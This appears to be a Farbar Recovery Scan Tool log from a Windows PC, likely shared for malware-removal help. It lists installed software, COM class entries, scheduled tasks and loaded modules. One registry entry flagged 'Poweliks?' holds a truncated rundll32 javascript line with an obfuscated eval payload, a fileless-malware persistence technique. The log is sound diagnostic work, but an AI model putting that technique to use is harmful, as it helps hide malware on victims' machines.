    Ashampoo Burning Studio 2013 v.11.0.6 (HKLM-x32\...\{91B33C97-0FBA-74AE-E802-D782F5C8AA89}_is1) (Version: 11.0.6 - Ashampoo GmbH & Co. KG)
    Ask Toolbar (HKLM-x32\...\{41525333-0076-A76A-76A7-A758B70B0A00}) (Version: 11.10.0.748 - Ask Partner Network) <==== ATTENTION
    Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
    Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.0.2208 - AVAST Software)
    AVS Video Converter 8 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 8.3.3.535 - Online Media Technologies Ltd.)
    Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
    bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
    BPDSoftware (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
    BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
    BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
    Camtasia Studio 8 (HKLM-x32\...\{DB93E2C2-851F-44B2-B09C-351D2C624AE1}) (Version: 8.0.4.1060 - TechSmith Corporation)
    CCleaner (HKLM\...\CCleaner) (Version: 5.01 - Piriform)
    Citrix Online Launcher (HKLM-x32\...\{C57F6C71-C365-4AFF-9108-397BBAD6127F}) (Version: 1.0.204 - Citrix)
    Cradle of Rome (HKLM-x32\...\exent_554750) (Version: - )
    CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version: 3.0 - CutePDF.com)
    Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
    DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
    Digital Voice Editor 3 (HKLM-x32\...\{6CCC133E-9A2F-4CAA-8866-75D029CD3AB3}) (Version: 3.3.01.11240 - Sony Corporation)
    DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
    Dropbox (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Dropbox) (Version: 2.6.24 - Dropbox, Inc.)
    eFax Messenger (HKLM-x32\...\{DF6DA606-904D-4C18-823F-A4CFC3035E53}) (Version: 4.4.2.533 - j2 Global)
    EPIM-Outlook Sync (HKLM-x32\...\EPIM-Outlook Sync) (Version: 6.0 - Astonsoft Ltd)
    EssentialPIM (HKLM-x32\...\EssentialPIM) (Version: 6.02 - Astonsoft Ltd)
    EssentialPIM Pro (HKLM-x32\...\EssentialPIM Pro) (Version: 6.03 - Astonsoft Ltd)
    Fax (x32 Version: 140.0.307.000 - Hewlett-Packard) Hidden
    FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google+ Auto Backup (HKLM-x32\...\{A50DE037-B5C0-4C8A-8049-B0C576B313D1}) (Version: 1.0.21.81 - Google)
    GoToMeeting 7.0.5.2130 (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\GoToMeeting) (Version: 7.0.5.2130 - CitrixOnline)
    GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
    Heroes of Hellas (HKLM-x32\...\exent_532150) (Version: - )
    HMA! Pro VPN 2.8.1.10 (HKLM-x32\...\HMA! Pro VPN) (Version: 2.8.1.10 - )
    HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
    HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
    HP OfficeJet J6400 14.0 Rel. 6 (HKLM\...\{4B4B81D9-3C2C-4388-A281-40F3299B911E}) (Version: 14.0 - HP)
    HP Officejet Pro 8600 Basic Device Software (HKLM\...\{791A06E2-340F-43B0-8FAB-62D151339362}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Officejet Pro 8600 Help (HKLM-x32\...\{46235FF7-2CBE-4A84-BEDA-87348D1F7850}) (Version: 28.0.0 - Hewlett Packard)
    HP Officejet Pro 8610 Basic Device Software (HKLM\...\{DAE3B13B-5097-4EAE-BC26-C463377BD80E}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
    HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard)
    HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{44157EB3-D8D0-4BB1-B0F5-AD2C38814ED1}) (Version: 11.51.0027 - Hewlett-Packard Company)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
    HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
    HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
    I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
    iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
    J6400 (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
    Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
    LTCM Client (HKLM-x32\...\{B38E9B55-7136-4E66-A084-320512FF3F6F}) (Version: 1.20.3792 - Leader Technologies Inc)
    magicJack (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\magicJack) (Version: 4.1.7574.5297 - magicJack L.P.)
    Malwarebytes' Anti-Malware (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: - Malwarebytes Corporation)
    MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
    McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
    Media Player Classic - Home Cinema v1.5.2.3456 (HKLM-x32\...\{2624B969-7135-4EB1-B0F6-2D8C397B45F7}_is1) (Version: 1.5.2.3456 - MPC-HC Team)
    Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Office Project Professional 2007 (HKLM-x32\...\PRJPRO) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 1.0.0.0 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Mozilla Firefox 34.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 en-US)) (Version: 34.0.5 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
    Mozilla Thunderbird 31.3.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.3.0 (x86 en-US)) (Version: 31.3.0 - Mozilla)
    mPlayer version 1.0 (HKLM-x32\...\{B482E758-D602-434C-80B9-DDEFEEAE4BCA}_is1) (Version: 1.0 - Download Freely, LLC)
    MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
    Nero BurnLite 10 (HKLM-x32\...\{842BEE12-CCCB-43F4-ABAF-CBA6DFE2583D}) (Version: 10.0.10600 - Nero AG)
    Nero BurnLite 10 (HKLM-x32\...\{AB627AF2-9C7E-4DBD-816B-3B2646B81E89}) (Version: 10.0.10500.5.100 - Nero AG)
    Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.0018 - Nero AG)
    NETGEAR Genie (HKLM-x32\...\NETGEAR Genie) (Version: 2.3.1.16 - NETGEAR Inc.)
    Network64 (Version: 140.0.306.000 - Hewlett-Packard) Hidden
    OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
    Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
    Product Improvement Study for HP Officejet Pro 8610 (HKLM\...\{710F7B0F-A679-4314-8E69-E868B660FAEA}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
    ProductContext (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
    QuickBooks Pro 2009 (HKLM-x32\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4001.703 - Intuit Inc.)
    RealDownloader (x32 Version: 1.3.3 - RealNetworks, Inc.) Hidden
    RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
    RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
    RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
    Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
    Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
    Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
    SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
    Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.4 - Sophos Limited)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.3.39 - Safer-Networking Ltd.)
    Stardock Start8 (HKLM-x32\...\Stardock Start8) (Version: 1.20 - Stardock Software, Inc.)
    Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
    SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.6.1010 - SUPERAntiSpyware.com)
    SupportSoft Assisted Service (HKLM-x32\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    TaxACT 2006 (HKLM-x32\...\TaxACT 2006) (Version: - 2nd Story Software, Inc.)
    TaxACT 2007 (HKLM-x32\...\TaxACT 2007) (Version: - 2nd Story Software, Inc.)
    TaxACT 2008 (HKLM-x32\...\TaxACT 2008) (Version: - 2nd Story Software, Inc.)
    TaxACT 2010 (HKLM-x32\...\TaxACT 2010) (Version: - 2nd Story Software, Inc.)
    TaxACT 2010 New York (HKLM-x32\...\TaxACT 2010 New York) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 - 1040 Edition (HKLM-x32\...\TaxACT 2012 - 1040 Edition) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 - 1120 Edition (HKLM-x32\...\TaxACT 2012 - 1120 Edition) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 New York - 1120 Edition (HKLM-x32\...\TaxACT 2012 New York - 1120 Edition) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 New York (HKLM-x32\...\TaxACT 2012 New York) (Version: - 2nd Story Software, Inc.)
    TaxACT 2013 - 1040 Edition (HKLM-x32\...\TaxACT 2013 - 1040 Edition) (Version: - TaxACT, Inc.)
    TaxACT 2013 - 1120 Edition (HKLM-x32\...\TaxACT 2013 - 1120 Edition) (Version: - TaxACT, Inc.)
    TaxACT 2013 New York - 1120 Edition (HKLM-x32\...\TaxACT 2013 New York - 1120 Edition) (Version: - TaxACT, Inc.)
    TaxACT 2013 New York (HKLM-x32\...\TaxACT 2013 New York) (Version: - TaxACT, Inc.)
    Time Riddles: The Mansion (HKLM-x32\...\exent_683150) (Version: - )
    Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
    TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
    TurboTax 2009 (HKLM-x32\...\TurboTax 2009) (Version: - Intuit, Inc)
    TurboTax Business 2010 (HKLM-x32\...\TurboTax Business 2010) (Version: - Intuit, Inc)
    Unity Web Player (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
    Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
    WD SmartWare (HKLM\...\{07179D37-D5FE-4373-90D9-A25B992EFB3E}) (Version: 1.4.5.5 - Western Digital)
    WD SmartWare (HKLM\...\{9798BB87-01B9-4D46-8EA0-6681E72BDE87}) (Version: 1.6.5.2 - Western Digital Technologies, Inc.)
    WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
    WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
    WinZip Courier (HKLM-x32\...\{CD95F661-A5C4-11AF-B2CC-ABCD21A325BC}) (Version: 4.5.10424 - WinZip Computing, S.L. )
    Wondershare DVD Creator(Build 2.6.5) (HKLM-x32\...\Wondershare DVD Creator_is1) (Version: - Wondershare)
    XMind 2012 (v3.3.1) (HKLM-x32\...\XMind_is1) (Version: 3.3.1.201212250029 - XMind Ltd.)
    Your Software Deals 1.0.0 (HKLM-x32\...\Your Software Deals_is1) (Version: 1.0.0 - Ashampoo GmbH & Co. KG)
    Youtube Downloader HD v. 2.9.9.14 (HKLM-x32\...\Youtube Downloader HD_is1) (Version: - YoutubeDownloaderHD.com)
    Zimbra Desktop (HKLM-x32\...\{B88E669F-9435-4677-A308-2D2690301754}) (Version: 7.2.5.12038 - Zimbra)

    ==================== Custom CLSID (selected items): ==========================

    (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{083f5ae0-2b0a-11dd-bd0b-0800200c9a66}\InprocServer32 -> C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{0E7BE950-4ACC-47CB-834B-41A8B96BBFF9}\InprocServer32 -> C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\Sidebar7.gadget\Release\Sidebar7.64.dll (Helmut Buhler)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{3560575F-7C2D-48AE-AB45-DAD430A95EBE}\InprocServer32 -> C:\Program Files (x86)\WinZip Courier\adxloader64.dll ()
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\NorMac\AppData\Local\Citrix\GoToMeeting\1440\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{943F19B2-32F9-4373-8D4C-DBE62B95F2CF}\InprocServer32 -> C:\Program Files (x86)\WinZip Courier\adxloader64.dll ()
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)

    ==================== Restore Points =========================


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2012-07-26 00:26 - 2014-10-30 09:38 - 00000027 ____A C:\WINDOWS\system32\Drivers\etc\hosts
    127.0.0.1 localhost

    ==================== Scheduled Tasks (whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

    Task: {0F8B3B22-4EA7-489F-8045-C48E18D91FA6} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDUpdate.exe
    Task: {1983858A-6EB9-4995-A988-409BF0C1868B} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-12-20] (AVAST Software)
    Task: {2769D9A0-4920-4AD7-9487-C5D5B4847B0A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDImmunize.exe
    Task: {48802F80-ED7F-430C-8645-3D1C31C0C1D1} - System32\Tasks\Open Chrome => Chrome.exe --new-window http://toolbar.avg.com/almost-done?pid=safeguard&amp;lang=en
    Task: {5A6D7855-2CB0-44BD-88B3-1032F9F78CB9} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {5DF0BDA0-D387-4B0B-AC1E-2A7A9F53C912} - System32\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000 => C:\Users\NorMac\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe [2014-12-24] (Citrix Online, a division of Citrix Systems, Inc.)
    Task: {606FCEDA-6C92-4E27-9427-ED08F354ED58} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {60DCDFEB-EDCB-4A6C-BF6D-E1CA8016626A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2014-11-27] (Microsoft Corporation)
    Task: {6FFB3B73-4E27-4117-9EA3-C2FC754F573B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDScan.exe
    Task: {7E5D0F91-D775-4A0A-83B3-5F3D2FA6F788} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-05-10] (Google Inc.)
    Task: {8F297ACA-A8AE-4D92-AF56-46D73B58F602} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {907BBD30-74CB-40E6-AA8F-AD8005FB2A5A} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {AD9B9AED-42BA-4E4C-8632-14F0FE33165F} - System32\Tasks\{4851C7F9-7E33-46BC-8896-C0A9DCBDA153} => pcalua.exe -a C:\ProgramData\BrowserProtect\2.6.1249.132\{c16c1ccb-7046-4e5c-a2f3-533ad2fec8e8}\uninstall.exe -c /Uninstall /{15D2D75C-9CB2-4efd-BAD7-B9B4CB4BC693} /su=3c3d33e7d8853371 /um
    Task: {AE7F524C-65FC-4D54-93A4-045E7D9F1F3A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-12-12] (Piriform Ltd)
    Task: {C203381B-56CD-4040-A1DE-B48855B365C5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {CBB23B04-EB3C-4940-BF29-43281C27A1D1} - System32\Tasks\HPCustParticipation HP Officejet Pro 8610 => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.)
    Task: {CD6CF9B9-297B-4922-8B33-DE74C19328CC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-05-10] (Google Inc.)
    Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000.job => C:\Users\NorMac\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\Open Chrome.job => c:\program files (x86)\Google\Chrome\Application\chrome.exe

    ==================== Loaded Modules (whitelisted) =============

    2012-12-19 17:57 - 2012-10-04 22:49 - 00087152 _____ () C:\WINDOWS\System32\cpwmon64.dll
    2013-08-14 14:19 - 2013-08-14 14:19 - 00039056 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
    2011-03-09 10:41 - 2011-03-09 10:41 - 01066896 _____ () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\WDFME.exe
    2011-03-09 10:41 - 2011-03-09 10:41 - 00491920 _____ () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDSC.exe
    2013-07-13 17:02 - 2013-01-12 13:33 - 00012520 _____ () C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\CoreTempReader.dll
    2013-07-13 17:02 - 2013-01-12 13:33 - 00015080 _____ () C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\GetCoreTempInfoNET.dll
    2013-07-13 17:02 - 2013-01-12 13:33 - 00014056 _____ () C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\SystemInfo.dll
    2013-11-14 08:12 - 2013-11-14 08:12 - 00105216 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\genie2_tray.exe
    2015-01-03 12:07 - 2015-01-03 12:07 - 02909696 _____ () C:\Program Files\AVAST Software\Avast\defs\15010301\algo.dll
    2015-01-04 08:44 - 2015-01-04 08:44 - 02909696 _____ () C:\Program Files\AVAST Software\Avast\defs\15010400\algo.dll
    2014-06-06 11:56 - 2014-04-25 13:11 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2014-06-06 11:56 - 2014-04-25 13:11 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2014-06-06 11:56 - 2014-04-25 13:11 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2014-06-06 11:56 - 2012-08-23 09:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2014-06-06 11:56 - 2012-04-03 16:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
    2010-03-05 08:24 - 2010-03-05 08:24 - 00886272 _____ () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\System.Data.SQLite.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00544817 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\libgcc_s_dw2-1.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00989805 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\libstdc++-6.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 03369922 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\icuin51.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 01978690 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\icuuc51.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 22378434 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\icudt51.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 01233408 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\platforms\qwindows.dll
    2013-12-06 03:04 - 2013-12-06 03:04 - 00465920 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\Genie.dll
    2013-12-05 06:36 - 2013-12-05 06:36 - 01547776 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\SvtNetworkTool.dll
    2013-11-10 20:59 - 2013-11-10 20:59 - 00192512 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Airprint.dll
    2013-12-05 06:37 - 2013-12-05 06:37 - 00631808 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Internet.dll
    2013-12-06 00:55 - 2013-12-06 00:55 - 04956160 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Map.dll
    2013-11-13 04:05 - 2013-11-13 04:05 - 00427520 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_NetworkProblem.dll
    2013-11-10 20:58 - 2013-11-10 20:58 - 00144896 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\DragonNetTool.dll
    2013-11-10 21:09 - 2013-11-10 21:09 - 01174528 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_ParentalControl.dll
    2013-12-05 06:31 - 2013-12-05 06:31 - 08558592 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Resource.dll
    2013-12-05 06:34 - 2013-12-05 06:34 - 01270272 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_RouterConfiguration.dll
    2013-11-10 20:59 - 2013-11-10 20:59 - 00068608 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\QRCode.dll
    2013-12-06 02:57 - 2013-12-06 02:57 - 00199680 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Statistics.dll
    2013-12-05 06:43 - 2013-12-05 06:43 - 00884736 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Ui.dll
    2013-11-10 21:21 - 2013-11-10 21:21 - 00427520 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Wireless.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00051200 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qgif.dll
